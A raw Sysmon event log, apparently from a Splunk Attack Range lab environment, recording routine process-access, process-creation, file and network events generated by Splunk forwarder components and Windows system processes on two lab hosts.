10341000x8000000000000000810703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8B7-60EB-EF79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.898{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B7-60EB-EF79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.899{0C1E0330-F8B7-60EB-EF79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.523{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=323CA87B1065A27A77CE6EEA4DC68F08,SHA256=146873D7F413F8C69A5EE985AD7639B08F0524A7AABDBCD41B22EC4DDFBDF9FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:27.085{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F57C325D2869C1EAB01AEEBEDE1586B2,SHA256=71A6C20BD6B9458A96F3338CA29EED1E88DFC6B66155BD1BB8D96190CB0C6AC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.382{0C1E0330-F8B7-60EB-EE79-00000000D001}16443692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B7-60EB-EE79-00000000D001}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8B7-60EB-EE79-00000000D001}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.210{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B7-60EB-EE79-00000000D001}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.211{0C1E0330-F8B7-60EB-EE79-00000000D001}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.742{0C1E0330-F8B8-60EB-F079-00000000D001}37764008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000810727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.219{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57485-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000810726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B8-60EB-F079-00000000D001}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 